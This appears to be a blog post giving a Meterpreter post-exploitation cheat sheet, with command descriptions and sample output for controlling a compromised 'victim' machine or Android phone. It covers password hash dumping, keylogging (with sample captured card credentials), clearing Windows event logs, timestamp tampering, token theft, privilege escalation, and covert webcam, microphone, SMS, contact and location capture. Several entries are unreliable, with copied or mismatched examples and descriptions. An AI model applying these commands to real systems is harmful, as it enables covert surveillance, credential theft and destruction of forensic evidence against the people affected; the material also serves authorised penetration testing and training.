0

Meterpreter Complete Cheatsheet

meterpreter complete cheatsheet-feature

Since the Meterpreter provides a whole new environment, we will cover some of the basic Meterpreter commands to get you started and help familiarize you with this most powerful tool.

Throughout this thread, almost every available Meterpreter command is covered. For those that aren’t covered, experimentation is the key to successful learning. And you are free to ask help for it.

list of commands covered:

core commands     File System commands     Networking Commands     User Interface        Other Useful commands
-------------     --------------------     -------------------     --------------        ---------------------
?                 cat                      ifconfig                enumdesktops          webcam_list
background        cd                       portfwd                 getdesktop            webcam_snap
bgkill            del                      route                   idletime              webcam_stream
bgrun             download                                         keyscan_start         record_mic
bglist            edit                     System Commands         keyscan_dump          activity_start
channel           getlwd                   ---------------         keyscan_stop          check_root
close             getwd                    clearev                 screenshot            geolocate
exit              lcd                      drop_token              set_desktop           wlan_geolocate
exploit           lpwd                     execute                 uictl                 dump_calllog
help              ls                       getpid                                        dump_contacts
interact          mkdir                    getprivs                Password hash         dump_sms
irb               pwd                      getuid                  -------------         send_sms
migrate           rm                       kill                    hashdump
quit              rmdir                    ps                      
read              upload                   reboot                  Timestomp commands
run               search                   reg                     ------------------
resource                                   rev2self                timestomp
use                                        shell
write                                      shutdown                Privilage Escalation
                                           steal_token             --------------------
                                           sys_info                getsystem

Note : bookmark this page as it is possibly the most complete cheat sheet of meterpreter commands found anywhere on the web, so you’ll want it to refer back to this sheet often.

Core commands

?

The ? command, as may be expected, displays the Meterpreter help menu.

  meterpreter > ?
  Core Commands
  =============
  
  Command       Description
  -------       -----------
  ?             Help menu
  background    Backgrounds the current session
  channel       Displays information about active channels
  ...snip...

background

The background command will send the current Meterpreter session to the background and return you to the ‘msf’ prompt. To get back to your Meterpreter session, just interact with it again.

  meterpreter > background
  msf exploit(ms08_067_netapi) > sessions -i 1
  [*] Starting interaction with 1...

bgkill

The bgkill command kills a background meterpreter script

bgrun

The bgrun command runs a script as a background thread

bglist

The bglist command provides a list of all running background scripts

channel

The channel command displays all active channels

close

The close command closes a channel

exit

The exit command terminates a meterpreter session

exploit

The exploit command executes the meterpreter script designated after it

help

The help command, as may be expected, displays the Meterpreter help menu as ? command

interact

The interact command starts to interact with a channel interacts with a channel

irb

The irb command switches into Ruby scripting mode

  meterpreter > irb
  [*] Starting IRB shell
  [*] The 'client' variable holds the meterpreter client
  
  >>

migrate

Using the migrate post module, you can migrate to another process on the victim.

 meterpreter > run post/windows/manage/migrate 
 
 [*] Running module against V-MAC-XP
 [*] Current server process: svchost.exe (1076)
 [*] Migrating to explorer.exe...
 [*] Migrating into process ID 816
 [*] New server process: Explorer.EXE (816)

quit

The quit command terminates the meterpreter session

read

The read command helps to reads the data from a channel

run

The run executes the meterpreter script designated after it

resource

The resource command will execute Meterpreter instructions load inside a text file. Containing one entry per line, resource will execute each line in sequence. This can help automate repetitive actions performed by a user. By default, the commands will run in the current working directory (on target machine) and resource file in the local working directory (the attacking machine).

 meterpreter > resource 
 Usage: resource path1 path2Run the commands stored in the supplied files.
 

use

The use command loads a meterpreter extension

write

The command command writes data to a channel

File system commands

cat

The cat command is identical to the command found on *nix systems. It displays the content of a file when it’s given as an argument.

  meterpreter > cat edit.txt
  What you talkin' about Willis

cd

The change directory “cd” works the same way as it does under DOS and *nix systems.

 meterpreter > cd c:\windows
 meterpreter > pwd
 c:\windows

del

The del command delete a file on the victim

download

The download command downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path. The -r option allows you to do so recursively.

  meterpreter > download c:\\boot.ini
  [*] downloading: c:\boot.ini -> c:\boot.ini
  [*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
  

edit

The edit command opens a file located on the target host. It uses the ‘vim’ so all the editor’s commands are available.

 meterpreter > edit edit.txt
 

getlwd

The getlwd command prints the local working directory

lcd

The lcd command changes working local directory. Changing the working directory will give your Meterpreter session access to files located in this folder.

 meterpreter > lcd /var/www
 meterpreter > lpwd
 /var/www
 

lpwd

The lpwd display working local directory. When receiving a Meterpreter shell, the local working directory is the location where one started the Metasploit console.

 meterpreter > lpwd
 /root
 

ls

As in Linux, the ls  command will list the files in the current remote directory.

 meterpreter > ls
 
 Listing: C:\Documents and Settings\victim
 =========================================
 
 Mode              Size     Type  Last modified                   Name
 ----              ----     ----  -------------                   ----
 40777/rwxrwxrwx   0        dir   Sat Oct 17 07:40:45 -0600 2009  .
 40777/rwxrwxrwx   0        dir   Fri Jun 19 13:30:00 -0600 2009  ..
 100666/rw-rw-rw-  218      fil   Sat Oct 03 14:45:54 -0600 2009  .recently-used.xbel
 40555/r-xr-xr-x   0        dir   Wed Nov 04 19:44:05 -0700 2009  Application Data
 ...snip...

mkdir

The mkdir  command makes a directory in victim’s system

pwd

The pwd  command displays current working directly on the target host. By default, the current working folder is where the connection to your listener was initiated.

rm

The rm  command as in *nix systems delete (remove) a file

rmdir

The rmdir command as in *nix systems delete (remove) a directory

upload

As with the download command, you need to use double-slashes with the upload command. It uploads a file into target system. The -r option allows you to do so recursively.

search

The search commands provides a way of locating specific files on the target host. The command is capable of searching through the whole system or specific folders. Wildcards can also be used when creating the file pattern to search for.

  meterpreter > search -f sea*.bat c:\\xamp\\
  Found 1 result...
  c:\\xampp\perl\bin\search.bat (57035 bytes)
 

Networking Commands

ifconfig, ipconfig

The ifconfig or ipconfig command displays the network interfaces and addresses on the remote machine.

 meterpreter > ipconfig
 
 MS TCP Loopback interface
 Hardware MAC: 00:00:00:00:00:00
 IP Address  : 127.0.0.1
 Netmask     : 255.0.0.0
 
 AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
 Hardware MAC: 00:0c:29:10:f5:15
 IP Address  : 192.168.1.104
 Netmask     : 255.255.0.0
 

portfwd

The portfwd command forwards a port on the victim system to a remote service

route

The route command helps to view or modify the victim routing table

System Commands

clearev

The clearev command will clear the Application, System, and Security logs on a Windows system. There are no options or arguments.

  meterpreter > clearev
  [*] Wiping 97 records from Application...
  [*] Wiping 415 records from System...
  [*] Wiping 0 records from Security...
  

drop_token

The drop_token command drops a stolen token

execute

The execute command runs a command on the target.

  meterpreter > execute -f cmd.exe -i -H
  Process 38320 created.
  Channel 1 created.
  Microsoft Windows XP [Version 5.1.2600]
  (C) Copyright 1985-2001 Microsoft Corp.
  
  C:\WINDOWS\system32>

getpid

The getpid command gets the current process ID (PID)

getprivs

The getprivs command gets as many privileges as possible

 meterpreter > getprivs 
 ============================================================
 Enabled Process Privileges
 ============================================================
 SeDebugPrivilege
 SeTcbPrivilege
 SeAssignPrimaryTokenPrivilege
 ....

getuid

The getuid command get the user that the server is running as host

kill

Thekill command get the user that the server is running as host

ps

The ps command displays a list of running processes on the target.

 meterpreter > ps
 
 Process list
 ============
 
 PID   Name                  Path
 ---   ----                  ----
 132   VMwareUser.exe        C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 152   VMwareTray.exe        C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 288   snmp.exe              C:\WINDOWS\System32\snmp.exe
 ...snip...

reboot

The reboot command reboots the victim computer

reg

The reg command interact with the victim’s registry

rev2self

The rev2self command calls RevertToSelf() on the victim machine

shell

The shell command will present you with a standard shell on the target system.

 meterpreter > shell
 Process 39640 created.
 Channel 2 created.
 Microsoft Windows XP [Version 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.
 
 C:\WINDOWS\system32>

shutdown

The shutdown command shuts down the victim’s computer

steal_token

The steal_token command attempts to steal the token of a specified (PID) process

sys_info

The sys_info command gets the details about the victim computer such as OS and name

UserInterface Commands

enumdesktops

The enumdesktops command lists all accessible desktops

 meterpreter > enumdesktops
 
 Enumerating all accessible desktops
 
 Desktops
 ========
 
 Session  Station   Name
 -------  -------   ----
 0        WinSta0   Default
 0        WinSta0   Disconnect
 0        WinSta0   Winlogon
 0        SAWinSta  SADesktop

getdesktop

The getdesktop command gets the current meterpreter desktop

idletime

The idletime command checks to see how long since the victim system has been idle or inactive.

 meterpreter > idletime
 User has been idle for: 5 hours 26 mins 35 secs
 

keyscan_start

The keyscan_start command starts the software keylogger when associated with a process such as Word or browser

 meterpreter > keyscan_start
 Starting the keystroke sniffer...
 

keyscan_dump

The keyscan_dump command starts the software keylogger when associated with a process such as Word or browser

 meterpreter > keyscan_dump
 Dumping captured keystrokes...
 tgoogle.cm my credit amex   myusernamthi     amexpasswordpassword
 

keyscan_stop

The keyscan_stop command stops the software keylogger

screenshot

The screenshot command grabs a screenshot of the meterpreter desktop

set_desktop

The set_desktop command changes the meterpreter desktop

uictl

The uictl command enables control of some of the user interface components

Privilege Escalation Commands

getsystem

The getsystem command uses 15 built-in methods to gain sysadmin privileges

Password hash Commands

hashdump

The hashdump post module will dump the contents of the SAM database.

 meterpreter > run post/windows/gather/hashdump 
 
 [*] Obtaining the boot key...
 [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
 [*] Obtaining the user list and keys...
 [*] Decrypting user keys...
 [*] Dumping password hashes...
 
 Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
 dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
 HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
 SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
 victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
 

Timestomp commands

timestomp

The timestomp command manipulates the modify, access, and create attributes of a file

 meterpreter > timestomp -h
 
 Usage: timestomp OPTIONS file_path
 
 OPTIONS:
 
 -a   Set the "last accessed" time of the file
 -b        Set the MACE timestamps so that EnCase shows blanks
 -c   Set the "creation" time of the file
 -e   Set the "mft entry modified" time of the file
 -f   Set the MACE of attributes equal to the supplied file
 -h        Help banner
 -m   Set the "last written" time of the file
 -r        Set the MACE timestamps recursively on a directory
 -v        Display the UTC MACE values of the file
 -z   Set all four attributes (MACE) of the file
 

Some other usefull commads

webcam_list

The webcam_list command lists all available wecams in target machine

 meterpreter > webcam_list
 1: Creative WebCam NX Pro
 2: Creative WebCam NX Pro (VFW)

webcam_snap

The webcam_snap takes picture through webcam

  meterpreter > webcam_snap -h
  Usage: webcam_snap [options]
  Grab a frame from the specified webcam.
  
  OPTIONS:
  
  -h      Help Banner
  -i   The index of the webcam to use (Default: 1)
  -p   The JPEG image path (Default: 'gnFjTnzi.jpeg')
  -q   The JPEG image quality (Default: '50')
  -v   Automatically view the JPEG image (Default: 'true')

webcam_stream

The webcam_stream get live streaming of target

  meterpreter > webcam_snap -h
  Usage: webcam_snap [options]
  Grab a frame from the specified webcam.
  
  OPTIONS:
  
  -h      Help Banner
  -i   The index of the webcam to use (Default: 1)
  -p   The JPEG image path (Default: 'gnFjTnzi.jpeg')
  -q   The JPEG image quality (Default: '50')
  -v   Automatically view the JPEG image (Default: 'true')

record_mic

The record_mic gets recoreded soundtrack of target

  meterpreter > record_mic -d 20
  [*] Starting...
  [*] Stopped
  Audio saved to: /Users/user/rapid7/msf/YAUtubCR.wav

activity_start

The activity_start is an execute command by starting an Android activity from a URI string.

check_root

The check_root checks the target is whether rooted or not

  meterpreter > check_root
  [*] Device is not rooted

geolocate

The geolocate allows you to locate the phone by retrieving the current lat-long using geolocation.

wlan_geolocate

The wlan_geolocate allows you to locate the phone by retrieving the current lat-long using WLAN information.

  meterpreter > wlan_geolocate
  [*] Google indicates the device is within 150 meters of 30.*******,-97.*******.
  [*] Google Maps URL:  https://maps.google.com/?q=30.*******,-97.*******
  

dump_calllog

The dump_calllog retrieves the call log from the Android device.

  meterpreter > dump_calllog
  [*] Fetching 500 entries
  [*] Contacts list saved to: calllog_dump_20160374745744.txt
  

dump_contacts

The dump_contacts retrieves contacts from target

   meterpreter > dump_contacts
   [*] Fetching 5 contacts into list
   [*] Contacts list saved to: contacts_dump_20160308155744.txt
  

dump_smd, sms_dump

The dump_sms or sms_dump retrieves the sms information from the Android device.

   meterpreter > dump_contacts
   [*] Fetching 5 contacts into list
   [*] Contacts list saved to: contacts_dump_20160308155744.txt
  

send_sms

The send allows to send sms from target machine

  meterpreter > send_sms -d 9678****** -t hacked
  [*] SMS send - Transmission succesfull
  

Stay Tuned for More Meterpreter Tips…😃

Related posts

Feedback !

Sorry if this tutorial seemed a bit mundane, but the information contained is still valuable! Don’t forget to voice your comments, questions, or concerns, I’m positive that they’ll all be addressed in some form.

Thanks for reading 😃

Leave a Reply

Your email address will not be published. Required fields are marked *